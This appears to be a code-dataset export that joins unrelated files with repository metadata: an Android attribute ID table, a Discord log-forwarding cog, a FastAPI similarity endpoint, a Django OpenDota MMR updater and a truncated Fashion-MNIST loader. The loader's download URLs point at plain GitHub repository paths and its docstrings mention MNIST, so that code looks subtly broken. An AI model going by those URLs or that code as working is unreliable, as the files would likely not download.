'detailColumn' : 16843427,
'detailSocialSummary' : 16843428,
'thumbnail' : 16843429,
'detachWallpaper' : 16843430,
'finishOnCloseSystemDialogs' : 16843431,
'scrollbarFadeDuration' : 16843432,
'scrollbarDefaultDelayBeforeFade' : 16843433,
'fadeScrollbars' : 16843434,
'colorBackgroundCacheHint' : 16843435,
'dropDownHorizontalOffset' : 16843436,
'dropDownVerticalOffset' : 16843437,
'quickContactBadgeStyleWindowSmall' : 16843438,
'quickContactBadgeStyleWindowMedium' : 16843439,
'quickContactBadgeStyleWindowLarge' : 16843440,
'quickContactBadgeStyleSmallWindowSmall' : 16843441,
'quickContactBadgeStyleSmallWindowMedium' : 16843442,
'quickContactBadgeStyleSmallWindowLarge' : 16843443,
'author' : 16843444,
'autoStart' : 16843445,
'expandableListViewWhiteStyle' : 16843446,
'installLocation' : 16843447,
'vmSafeMode' : 16843448,
'webTextViewStyle' : 16843449,
'restoreAnyVersion' : 16843450,
'tabStripLeft' : 16843451,
'tabStripRight' : 16843452,
'tabStripEnabled' : 16843453,
'logo' : 16843454,
'xlargeScreens' : 16843455,
'immersive' : 16843456,
'overScrollMode' : 16843457,
'overScrollHeader' : 16843458,
'overScrollFooter' : 16843459,
'filterTouchesWhenObscured' : 16843460,
'textSelectHandleLeft' : 16843461,
'textSelectHandleRight' : 16843462,
'textSelectHandle' : 16843463,
'textSelectHandleWindowStyle' : 16843464,
'popupAnimationStyle' : 16843465,
'screenSize' : 16843466,
'screenDensity' : 16843467,
'allContactsName' : 16843468,
'windowActionBar' : 16843469,
'actionBarStyle' : 16843470,
'navigationMode' : 16843471,
'displayOptions' : 16843472,
'subtitle' : 16843473,
'customNavigationLayout' : 16843474,
'hardwareAccelerated' : 16843475,
'measureWithLargestChild' : 16843476,
'animateFirstView' : 16843477,
'dropDownSpinnerStyle' : 16843478,
'actionDropDownStyle' : 16843479,
'actionButtonStyle' : 16843480,
'showAsAction' : 16843481,
'previewImage' : 16843482,
'actionModeBackground' : 16843483,
'actionModeCloseDrawable' : 16843484,
'windowActionModeOverlay' : 16843485,
'valueFrom' : 16843486,
'valueTo' : 16843487,
'valueType' : 16843488,
'propertyName' : 16843489,
'ordering' : 16843490,
'fragment' : 16843491,
'windowActionBarOverlay' : 16843492,
'fragmentOpenEnterAnimation' : 16843493,
'fragmentOpenExitAnimation' : 16843494,
'fragmentCloseEnterAnimation' : 16843495,
'fragmentCloseExitAnimation' : 16843496,
'fragmentFadeEnterAnimation' : 16843497,
'fragmentFadeExitAnimation' : 16843498,
'actionBarSize' : 16843499,
'imeSubtypeLocale' : 16843500,
'imeSubtypeMode' : 16843501,
'imeSubtypeExtraValue' : 16843502,
'splitMotionEvents' : 16843503,
'listChoiceBackgroundIndicator' : 16843504,
'spinnerMode' : 16843505,
'animateLayoutChanges' : 16843506,
'actionBarTabStyle' : 16843507,
'actionBarTabBarStyle' : 16843508,
'actionBarTabTextStyle' : 16843509,
'actionOverflowButtonStyle' : 16843510,
'actionModeCloseButtonStyle' : 16843511,
'titleTextStyle' : 16843512,
'subtitleTextStyle' : 16843513,
'iconifiedByDefault' : 16843514,
'actionLayout' : 16843515,
'actionViewClass' : 16843516,
'activatedBackgroundIndicator' : 16843517,
'state_activated' : 16843518,
'listPopupWindowStyle' : 16843519,
'popupMenuStyle' : 16843520,
'textAppearanceLargePopupMenu' : 16843521,
'textAppearanceSmallPopupMenu' : 16843522,
'breadCrumbTitle' : 16843523,
'breadCrumbShortTitle' : 16843524,
'listDividerAlertDialog' : 16843525,
'textColorAlertDialogListItem' : 16843526,
'loopViews' : 16843527,
'dialogTheme' : 16843528,
'alertDialogTheme' : 16843529,
'dividerVertical' : 16843530,
'homeAsUpIndicator' : 16843531,
'enterFadeDuration' : 16843532,
'exitFadeDuration' : 16843533,
'selectableItemBackground' : 16843534,
'autoAdvanceViewId' : 16843535,
'useIntrinsicSizeAsMinimum' : 16843536,
'actionModeCutDrawable' : 16843537,
'actionModeCopyDrawable' : 16843538,
'actionModePasteDrawable' : 16843539,
'textEditPasteWindowLayout' : 16843540,
'textEditNoPasteWindowLayout' : 16843541,
'textIsSelectable' : 16843542,
'windowEnableSplitTouch' : 16843543,
'indeterminateProgressStyle' : 16843544,
'progressBarPadding' : 16843545,
'animationResolution' : 16843546,
'state_accelerated' : 16843547,
'baseline' : 16843548,
'homeLayout' : 16843549,
'opacity' : 16843550,
'alpha' : 16843551,
'transformPivotX' : 16843552,
'transformPivotY' : 16843553,
'translationX' : 16843554,
'translationY' : 16843555,
'scaleX' : 16843556,
'scaleY' : 16843557,
'rotation' : 16843558,
'rotationX' : 16843559,
'rotationY' : 16843560,
'showDividers' : 16843561,
'dividerPadding' : 16843562,
'borderlessButtonStyle' : 16843563,
'dividerHorizontal' : 16843564,
'itemPadding' : 16843565,
'buttonBarStyle' : 16843566,
'buttonBarButtonStyle' : 16843567,
'segmentedButtonStyle' : 16843568,
'staticWallpaperPreview' : 16843569,
'allowParallelSyncs' : 16843570,
'isAlwaysSyncable' : 16843571,
'verticalScrollbarPosition' : 16843572,
'fastScrollAlwaysVisible' : 16843573,
'fastScrollThumbDrawable' : 16843574,
'fastScrollPreviewBackgroundLeft' : 16843575,
'fastScrollPreviewBackgroundRight' : 16843576,
'fastScrollTrackDrawable' : 16843577,
'fastScrollOverlayPosition' : 16843578,
'customTokens' : 16843579,
'nextFocusForward' : 16843580,
'firstDayOfWeek' : 16843581,
'showWeekNumber' : 16843582,
'minDate' : 16843583,
'maxDate' : 16843584,
'shownWeekCount' : 16843585,
'selectedWeekBackgroundColor' : 16843586,
'focusedMonthDateColor' : 16843587,
'unfocusedMonthDateColor' : 16843588,
'weekNumberColor' : 16843589,
'weekSeparatorLineColor' : 16843590,
'selectedDateVerticalBar' : 16843591,
'weekDayTextAppearance' : 16843592,
'dateTextAppearance' : 16843593,
'solidColor' : 16843594,
'spinnersShown' : 16843595,
'calendarViewShown' : 16843596,
'state_multiline' : 16843597,
'detailsElementBackground' : 16843598,
'textColorHighlightInverse' : 16843599,
'textColorLinkInverse' : 16843600,
'editTextColor' : 16843601,
'editTextBackground' : 16843602,
'horizontalScrollViewStyle' : 16843603,
'layerType' : 16843604,
'alertDialogIcon' : 16843605,
'windowMinWidthMajor' : 16843606,
'windowMinWidthMinor' : 16843607,
'queryHint' : 16843608,
'fastScrollTextColor' : 16843609,
'largeHeap' : 16843610,
'windowCloseOnTouchOutside' : 16843611,
'datePickerStyle' : 16843612,
'calendarViewStyle' : 16843613,
'textEditSidePasteWindowLayout' : 16843614,
'textEditSideNoPasteWindowLayout' : 16843615,
'actionMenuTextAppearance' : 16843616,
'actionMenuTextColor' : 16843617,
'textCursorDrawable' : 16843618,
'resizeMode' : 16843619,
'requiresSmallestWidthDp' : 16843620,
'compatibleWidthLimitDp' : 16843621,
'largestWidthLimitDp' : 16843622,
'state_hovered' : 16843623,
'state_drag_can_accept' : 16843624,
'state_drag_hovered' : 16843625,
'stopWithTask' : 16843626,
'switchTextOn' : 16843627,
'switchTextOff' : 16843628,
'switchPreferenceStyle' : 16843629,
'switchTextAppearance' : 16843630,
'track' : 16843631,
'switchMinWidth' : 16843632,
'switchPadding' : 16843633,
'thumbTextPadding' : 16843634,
'textSuggestionsWindowStyle' : 16843635,
'textEditSuggestionItemLayout' : 16843636,
'rowCount' : 16843637,
'rowOrderPreserved' : 16843638,
'columnCount' : 16843639,
'columnOrderPreserved' : 16843640,
'useDefaultMargins' : 16843641,
'alignmentMode' : 16843642,
'layout_row' : 16843643,
'layout_rowSpan' : 16843644,
'layout_columnSpan' : 16843645,
'actionModeSelectAllDrawable' : 16843646,
'isAuxiliary' : 16843647,
'accessibilityEventTypes' : 16843648,
'packageNames' : 16843649,
'accessibilityFeedbackType' : 16843650,
'notificationTimeout' : 16843651,
'accessibilityFlags' : 16843652,
'canRetrieveWindowContent' : 16843653,
'listPreferredItemHeightLarge' : 16843654,
'listPreferredItemHeightSmall' : 16843655,
'actionBarSplitStyle' : 16843656,
'actionProviderClass' : 16843657,
'backgroundStacked' : 16843658,
'backgroundSplit' : 16843659,
'textAllCaps' : 16843660,
'colorPressedHighlight' : 16843661,
'colorLongPressedHighlight' : 16843662,
'colorFocusedHighlight' : 16843663,
'colorActivatedHighlight' : 16843664,
'colorMultiSelectHighlight' : 16843665,
'drawableStart' : 16843666,
'drawableEnd' : 16843667,
'actionModeStyle' : 16843668,
'minResizeWidth' : 16843669,
'minResizeHeight' : 16843670,
'actionBarWidgetTheme' : 16843671,
'uiOptions' : 16843672,
'subtypeLocale' : 16843673,
'subtypeExtraValue' : 16843674,
'actionBarDivider' : 16843675,
'actionBarItemBackground' : 16843676,
'actionModeSplitBackground' : 16843677,
'textAppearanceListItem' : 16843678,
'textAppearanceListItemSmall' : 16843679,
'targetDescriptions' : 16843680,
'directionDescriptions' : 16843681,
'overridesImplicitlyEnabledSubtype' : 16843682,
'listPreferredItemPaddingLeft' : 16843683,
'listPreferredItemPaddingRight' : 16843684,
'requiresFadingEdge' : 16843685,
'publicKey' : 16843686,
'parentActivityName' : 16843687,
'isolatedProcess' : 16843689,
'importantForAccessibility' : 16843690,
'keyboardLayout' : 16843691,
'fontFamily' : 16843692,
'mediaRouteButtonStyle' : 16843693,
'mediaRouteTypes' : 16843694,
'supportsRtl' : 16843695,
'textDirection' : 16843696,
'textAlignment' : 16843697,
'layoutDirection' : 16843698,
'paddingStart' : 16843699,
'paddingEnd' : 16843700,
'layout_marginStart' : 16843701,
'layout_marginEnd' : 16843702,
'layout_toStartOf' : 16843703,
'layout_toEndOf' : 16843704,
'layout_alignStart' : 16843705,
'layout_alignEnd' : 16843706,
'layout_alignParentStart' : 16843707,
'layout_alignParentEnd' : 16843708,
'listPreferredItemPaddingStart' : 16843709,
'listPreferredItemPaddingEnd' : 16843710,
'singleUser' : 16843711,
'presentationTheme' : 16843712,
'subtypeId' : 16843713,
'initialKeyguardLayout' : 16843714,
'widgetCategory' : 16843716,
'permissionGroupFlags' : 16843717,
'labelFor' : 16843718,
'permissionFlags' : 16843719,
'checkedTextViewStyle' : 16843720,
'showOnLockScreen' : 16843721,
'format12Hour' : 16843722,
'format24Hour' : 16843723,
'timeZone' : 16843724,
'mipMap' : 16843725,
'mirrorForRtl' : 16843726,
'windowOverscan' : 16843727,
'requiredForAllUsers' : 16843728,
'indicatorStart' : 16843729,
'indicatorEnd' : 16843730,
'childIndicatorStart' : 16843731,
'childIndicatorEnd' : 16843732,
'restrictedAccountType' : 16843733,
'requiredAccountType' : 16843734,
'canRequestTouchExplorationMode' : 16843735,
'canRequestEnhancedWebAccessibility' : 16843736,
'canRequestFilterKeyEvents' : 16843737,
'layoutMode' : 16843738,
'keySet' : 16843739,
'targetId' : 16843740,
'fromScene' : 16843741,
'toScene' : 16843742,
'transition' : 16843743,
'transitionOrdering' : 16843744,
'fadingMode' : 16843745,
'startDelay' : 16843746,
'ssp' : 16843747,
'sspPrefix' : 16843748,
'sspPattern' : 16843749,
'addPrintersActivity' : 16843750,
'vendor' : 16843751,
'category' : 16843752,
'isAsciiCapable' : 16843753,
'autoMirrored' : 16843754,
'supportsSwitchingToNextInputMethod' : 16843755,
'requireDeviceUnlock' : 16843756,
'apduServiceBanner' : 16843757,
'accessibilityLiveRegion' : 16843758,
'windowTranslucentStatus' : 16843759,
'windowTranslucentNavigation' : 16843760,
'advancedPrintOptionsActivity' : 16843761,
'banner' : 16843762,
'windowSwipeToDismiss' : 16843763,
'isGame' : 16843764,
'allowEmbedded' : 16843765,
'setupActivity' : 16843766,
'fastScrollStyle' : 16843767,
'windowContentTransitions' : 16843768,
'windowContentTransitionManager' : 16843769,
'translationZ' : 16843770,
'tintMode' : 16843771,
'controlX1' : 16843772,
'controlY1' : 16843773,
'controlX2' : 16843774,
'controlY2' : 16843775,
'transitionName' : 16843776,
'transitionGroup' : 16843777,
'viewportWidth' : 16843778,
'viewportHeight' : 16843779,
'fillColor' : 16843780,
'pathData' : 16843781,
'strokeColor' : 16843782,
'strokeWidth' : 16843783,
'trimPathStart' : 16843784,
'trimPathEnd' : 16843785,
'trimPathOffset' : 16843786,
'strokeLineCap' : 16843787,
'strokeLineJoin' : 16843788,
'strokeMiterLimit' : 16843789,
'colorControlNormal' : 16843817,
'colorControlActivated' : 16843818,
'colorButtonNormal' : 16843819,
'colorControlHighlight' : 16843820,
'persistableMode' : 16843821,
'titleTextAppearance' : 16843822,
'subtitleTextAppearance' : 16843823,
'slideEdge' : 16843824,
'actionBarTheme' : 16843825,
'textAppearanceListItemSecondary' : 16843826,
'colorPrimary' : 16843827,
'colorPrimaryDark' : 16843828,
'colorAccent' : 16843829,
'nestedScrollingEnabled' : 16843830,
'windowEnterTransition' : 16843831,
'windowExitTransition' : 16843832,
'windowSharedElementEnterTransition' : 16843833,
'windowSharedElementExitTransition' : 16843834,
'windowAllowReturnTransitionOverlap' : 16843835,
'windowAllowEnterTransitionOverlap' : 16843836,
'sessionService' : 16843837,
'stackViewStyle' : 16843838,
'switchStyle' : 16843839,
'elevation' : 16843840,
'excludeId' : 16843841,
'excludeClass' : 16843842,
'hideOnContentScroll' : 16843843,
'actionOverflowMenuStyle' : 16843844,
'documentLaunchMode' : 16843845,
'maxRecents' : 16843846,
'autoRemoveFromRecents' : 16843847,
'stateListAnimator' : 16843848,
'toId' : 16843849,
'fromId' : 16843850,
'reversible' : 16843851,
'splitTrack' : 16843852,
'targetName' : 16843853,
'excludeName' : 16843854,
'matchOrder' : 16843855,
'windowDrawsSystemBarBackgrounds' : 16843856,
'statusBarColor' : 16843857,
'navigationBarColor' : 16843858,
'contentInsetStart' : 16843859,
'contentInsetEnd' : 16843860,
'contentInsetLeft' : 16843861,
'contentInsetRight' : 16843862,
'paddingMode' : 16843863,
'layout_rowWeight' : 16843864,
'layout_columnWeight' : 16843865,
'translateX' : 16843866,
'translateY' : 16843867,
'selectableItemBackgroundBorderless' : 16843868,
'elegantTextHeight' : 16843869,
'searchKeyphraseId' : 16843870,
'searchKeyphrase' : 16843871,
'searchKeyphraseSupportedLocales' : 16843872,
'windowTransitionBackgroundFadeDuration' : 16843873,
'overlapAnchor' : 16843874,
'progressTint' : 16843875,
'progressTintMode' : 16843876,
'progressBackgroundTint' : 16843877,
'progressBackgroundTintMode' : 16843878,
'secondaryProgressTint' : 16843879,
'secondaryProgressTintMode' : 16843880,
'indeterminateTint' : 16843881,
'indeterminateTintMode' : 16843882,
'backgroundTint' : 16843883,
'backgroundTintMode' : 16843884,
'foregroundTint' : 16843885,
'foregroundTintMode' : 16843886,
'buttonTint' : 16843887,
'buttonTintMode' : 16843888,
'thumbTint' : 16843889,
'thumbTintMode' : 16843890,
'fullBackupOnly' : 16843891,
'propertyXName' : 16843892,
'propertyYName' : 16843893,
'relinquishTaskIdentity' : 16843894,
'tileModeX' : 16843895,
'tileModeY' : 16843896,
'actionModeShareDrawable' : 16843897,
'actionModeFindDrawable' : 16843898,
'actionModeWebSearchDrawable' : 16843899,
'transitionVisibilityMode' : 16843900,
'minimumHorizontalAngle' : 16843901,
'minimumVerticalAngle' : 16843902,
'maximumAngle' : 16843903,
'searchViewStyle' : 16843904,
'closeIcon' : 16843905,
'goIcon' : 16843906,
'searchIcon' : 16843907,
'voiceIcon' : 16843908,
'commitIcon' : 16843909,
'suggestionRowLayout' : 16843910,
'queryBackground' : 16843911,
'submitBackground' : 16843912,
'buttonBarPositiveButtonStyle' : 16843913,
'buttonBarNeutralButtonStyle' : 16843914,
'buttonBarNegativeButtonStyle' : 16843915,
'popupElevation' : 16843916,
'actionBarPopupTheme' : 16843917,
'multiArch' : 16843918,
'touchscreenBlocksFocus' : 16843919,
'windowElevation' : 16843920,
'launchTaskBehindTargetAnimation' : 16843921,
'launchTaskBehindSourceAnimation' : 16843922,
'restrictionType' : 16843923,
'dayOfWeekBackground' : 16843924,
'dayOfWeekTextAppearance' : 16843925,
'headerMonthTextAppearance' : 16843926,
'headerDayOfMonthTextAppearance' : 16843927,
'headerYearTextAppearance' : 16843928,
'yearListItemTextAppearance' : 16843929,
'yearListSelectorColor' : 16843930,
'calendarTextColor' : 16843931,
'recognitionService' : 16843932,
'timePickerStyle' : 16843933,
'timePickerDialogTheme' : 16843934,
'headerTimeTextAppearance' : 16843935,
'headerAmPmTextAppearance' : 16843936,
'numbersTextColor' : 16843937,
'numbersBackgroundColor' : 16843938,
'numbersSelectorColor' : 16843939,
'amPmTextColor' : 16843940,
'amPmBackgroundColor' : 16843941,
'searchKeyphraseRecognitionFlags' : 16843942,
'checkMarkTint' : 16843943,
'checkMarkTintMode' : 16843944,
'popupTheme' : 16843945,
'toolbarStyle' : 16843946,
'windowClipToOutline' : 16843947,
'datePickerDialogTheme' : 16843948,
'showText' : 16843949,
'windowReturnTransition' : 16843950,
'windowReenterTransition' : 16843951,
'windowSharedElementReturnTransition' : 16843952,
'windowSharedElementReenterTransition' : 16843953,
'resumeWhilePausing' : 16843954,
'datePickerMode' : 16843955,
'timePickerMode' : 16843956,
'inset' : 16843957,
'letterSpacing' : 16843958,
'fontFeatureSettings' : 16843959,
'outlineProvider' : 16843960,
'contentAgeHint' : 16843961,
'country' : 16843962,
'windowSharedElementsUseOverlay' : 16843963,
'reparent' : 16843964,
'reparentWithOverlay' : 16843965,
'ambientShadowAlpha' : 16843966,
'spotShadowAlpha' : 16843967,
'navigationIcon' : 16843968,
'navigationContentDescription' : 16843969,
'fragmentExitTransition' : 16843970,
'fragmentEnterTransition' : 16843971,
'fragmentSharedElementEnterTransition' : 16843972,
'fragmentReturnTransition' : 16843973,
'fragmentSharedElementReturnTransition' : 16843974,
'fragmentReenterTransition' : 16843975,
'fragmentAllowEnterTransitionOverlap' : 16843976,
'fragmentAllowReturnTransitionOverlap' : 16843977,
'patternPathData' : 16843978,
'strokeAlpha' : 16843979,
'fillAlpha' : 16843980,
'windowActivityTransitions' : 16843981,
'colorEdgeEffect' : 16843982
}
}
# Bidirectional lookup tables built from the raw `resources` map.
# "forward" maps resource name -> numeric Android ID;
# "inverse" maps numeric ID -> resource name.
SYSTEM_RESOURCES = {
    "attributes": {
        # dict(...) is equivalent to the identity comprehension
        # {k: v for k, v in ...items()} and makes the copy intent explicit.
        "forward": dict(resources['attr']),
        "inverse": {v: k for k, v in resources['attr'].items()},
    },
    "styles": {
        "forward": dict(resources['style']),
        "inverse": {v: k for k, v in resources['style'].items()},
    },
}
| 0 | 0 | 0 |
d04cc6df4bc2c6680f882e969a37c77d253e0edb | 1,146 | py | Python | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | 1 | 2021-01-23T15:06:27.000Z | 2021-01-23T15:06:27.000Z | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | 12 | 2021-02-03T08:29:44.000Z | 2022-02-13T14:50:35.000Z | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | null | null | null | import asyncio
import logging
import logging.handlers
import discord
from discord.ext import commands, tasks
| 29.384615 | 98 | 0.685864 | import asyncio
import logging
import logging.handlers
import discord
from discord.ext import commands, tasks
class ChannelLogger(commands.Cog):
    """Cog that mirrors Python ``logging`` output into a Discord channel.

    A ``QueueHandler`` is attached to the root logger; a background
    ``tasks.loop`` drains the queue and posts each formatted record to
    the channel configured via ``bot_config["channel_id"]``.
    """

    def __init__(self, bot: commands.Bot, bot_config: dict):
        self._bot = bot
        # Log records produced anywhere in the process are funneled here.
        # NOTE(review): asyncio.Queue is not thread-safe; this is fine only
        # if all logging happens on the event-loop thread -- confirm.
        self._logging_queue = asyncio.Queue()
        logger = logging.getLogger()
        handler = logging.handlers.QueueHandler(self._logging_queue)
        handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
        logger.addHandler(handler)
        # assumes "channel_id" is a numeric Discord channel id -- TODO confirm
        # (the "" fallback would make get_channel() return None).
        self._log_channel_id = bot_config.get("channel_id", "")
        # Start draining immediately; before_logger_task delays the first
        # iteration until the bot is ready.
        self.logger_task.start()

    async def send_log(self, log: str):
        """Post one log line to the configured channel as a code block."""
        channel: discord.abc.GuildChannel = self._bot.get_channel(self._log_channel_id)
        await channel.send(f"```{log}```")

    @tasks.loop()
    async def logger_task(self) -> None:
        """Forward the next queued log record to Discord (runs forever)."""
        record: logging.LogRecord = await self._logging_queue.get()
        # QueueHandler.prepare() formats each record before enqueueing, so
        # record.message already holds the fully formatted line.
        await self.send_log(record.message)

    @logger_task.before_loop
    async def before_logger_task(self) -> None:
        # Do not touch channels until the bot's connection/cache is ready.
        await self._bot.wait_until_ready()
def setup(bot):
    """Extension entry point: register the channel-logging cog on *bot*."""
    cog = ChannelLogger(bot, bot.ext)
    bot.add_cog(cog)
| 821 | 167 | 46 |
77127d496d0c63d976c793da0625cd048509dd2b | 383 | py | Python | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | 4 | 2021-06-17T12:46:21.000Z | 2022-01-10T18:44:26.000Z | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | null | null | null | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | null | null | null | from typing import Dict
from fastapi import FastAPI, Query
from text_similarity.similarity import Texts
app = FastAPI()
@app.post("/similarity")
| 21.277778 | 76 | 0.699739 | from typing import Dict
from fastapi import FastAPI, Query
from text_similarity.similarity import Texts
app = FastAPI()
@app.post("/similarity")
def text_similarity(
    texts: Texts,
    ngram_limit: int = Query(
        # Typo fix: "comparision" -> "comparison" in the OpenAPI description.
        3, description="The highest ngram used for comparison.", ge=1, le=5
    ),
) -> Dict[str, float]:
    """Return the n-gram similarity score for the submitted texts.

    The score is computed by ``Texts.similarity`` using n-grams up to
    ``ngram_limit`` (1..5, default 3).
    """
    return {"similarity": texts.similarity(ngram_limit)}
| 211 | 0 | 22 |
f2756eca852c41fc3a17a4de7a36eb1528d26c22 | 77 | py | Python | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | """Hello World for python."""
a = 3
print(a)
print(a, ' helloworld number')
| 12.833333 | 30 | 0.636364 | """Hello World for python."""
a = 3  # demo value for the prints below
print(a)  # prints: 3
print(a, ' helloworld number')  # prints: 3  helloworld number (sep + leading space)
| 0 | 0 | 0 |
bfaa4d5a67ed38a780d1203d6ffc677680e05f9b | 914 | py | Python | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 9 | 2017-04-10T09:40:01.000Z | 2020-01-31T17:15:41.000Z | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 19 | 2017-02-22T16:26:02.000Z | 2020-02-04T16:08:16.000Z | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 3 | 2017-04-17T06:37:58.000Z | 2021-04-09T18:16:28.000Z | import requests
from threading import Thread
from django.db import connection
from django.utils import timezone
from .models import Player
| 21.761905 | 65 | 0.705689 | import requests
from threading import Thread
from django.db import connection
from django.utils import timezone
from .models import Player
class OPENDOTA:
    """URL templates for the OpenDota REST API."""

    # Player endpoint; format with the 32-bit Steam account id.
    PLAYERS = "https://api.opendota.com/api/players/{account_id}"
def _update_player_mmr(player_id):
    """Fetch a player's MMR from OpenDota and persist it on the Player row.

    Does nothing when the Player no longer exists.
    """
    try:
        player = Player.objects.get(pk=player_id)
    except Player.DoesNotExist:
        # Player was deleted before this worker ran; nothing to update.
        return
    endpoint = OPENDOTA.PLAYERS.format(account_id=player.user.steamid32)
    # Renamed from `json` to avoid shadowing the stdlib module name.
    payload = requests.get(endpoint).json()
    solo_mmr = payload['solo_competitive_rank']
    estimated_mmr = payload['mmr_estimate']['estimate']
    if estimated_mmr:
        player.mmr_estimate = estimated_mmr
    if solo_mmr:
        player.mmr = int(solo_mmr)
    player.mmr_last_updated = timezone.now()
    player.save()
    # NOTE(review): close() runs only on the success path; the early return
    # above skips it -- confirm that is intended for this worker thread.
    connection.close()
def update_player_mmr(player_id):
    """Refresh this player's MMR asynchronously on a background thread."""
    worker = Thread(target=_update_player_mmr, args=(player_id,))
    worker.start()
| 641 | 60 | 69 |
8aaba90b69e7591913e474723e3136553c765651 | 10,632 | py | Python | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 7 | 2021-09-04T13:10:07.000Z | 2022-03-21T08:51:45.000Z | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 1 | 2021-11-15T04:39:34.000Z | 2021-11-19T08:09:42.000Z | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 1 | 2022-03-25T16:52:05.000Z | 2022-03-25T16:52:05.000Z | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provide data iterator for MNIST examples.
"""
import argparse
import random
import os
import numpy
import struct
import zlib
import tqdm
import numpy as np
import csv
from imageio import imwrite
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
def load_mnist(train=True):
"""
Load MNIST dataset images and labels from the original page by Yan LeCun or the cache file.
Args:
train (bool): The testing dataset will be returned if False. Training data has 60000 images, while testing has 10000 images.
Returns:
numpy.ndarray: A shape of (#images, 1, 28, 28). Values in [0.0, 1.0].
numpy.ndarray: A shape of (#images, 1). Values in {0, 1, ..., 9}.
"""
if train:
image_uri = "https://github.com/zalandoresearch/fashion-mnist/train-images-idx3-ubyte.gz"
label_uri = "https://github.com/zalandoresearch/fashion-mnist/train-labels-idx1-ubyte.gz"
else:
image_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-images-idx3-ubyte.gz"
)
label_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-labels-idx1-ubyte.gz"
)
logger.info("Getting label data from {}.".format(label_uri))
# With python3 we can write this logic as following, but with
# python2, gzip.object does not support file-like object and
# urllib.request does not support 'with statement'.
#
# with request.urlopen(label_uri) as r, gzip.open(r) as f:
# _, size = struct.unpack('>II', f.read(8))
# labels = numpy.frombuffer(f.read(), numpy.uint8).reshape(-1, 1)
#
r = download(label_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size = struct.unpack(">II", data[0:8])
labels = numpy.frombuffer(data[8:], numpy.uint8).reshape(-1, 1)
r.close()
logger.info("Getting label data done.")
logger.info("Getting image data from {}.".format(image_uri))
r = download(image_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size, height, width = struct.unpack(">IIII", data[0:16])
images = numpy.frombuffer(data[16:], numpy.uint8).reshape(
size, 1, height, width)
r.close()
logger.info("Getting image data done.")
return images, labels
class FashionMnistDataSource(DataSource):
"""
Get data directly from MNIST dataset from Internet(yann.lecun.com).
"""
@property
def images(self):
"""Get copy of whole data with a shape of (N, 1, H, W)."""
return self._images.copy()
@property
def labels(self):
"""Get copy of whole label with a shape of (N, 1)."""
return self._labels.copy()
@property
def data_iterator_fashion_mnist(
batch_size,
train=True,
rng=None,
shuffle=True,
with_memory_cache=False,
with_file_cache=False,
label_shuffle=False,
label_shuffle_rate=0.1,
):
"""
Provide DataIterator with :py:class:`FashionMnistDataSource`
with_memory_cache and with_file_cache option's default value is all False,
because :py:class:`FashionMnistDataSource` is able to store all data into memory.
For example,
.. code-block:: python
with data_iterator_mnist(True, batch_size) as di:
for data in di:
SOME CODE TO USE data.
"""
return data_iterator(
FashionMnistDataSource(
train=train,
shuffle=shuffle,
rng=rng,
label_shuffle=label_shuffle,
label_shuffle_rate=label_shuffle_rate,
),
batch_size,
rng,
with_memory_cache,
with_file_cache,
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--label_shuffle", action="store_true", help="generate label shuffled dataset"
)
parser.add_argument("--seed", type=int, default=0)
parser.add_argument("--shuffle_rate", type=float, default=0.1)
args = parser.parse_args()
set_seed()
print("Label Shuffle: ", args.label_shuffle)
main()
| 32.316109 | 132 | 0.605813 | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
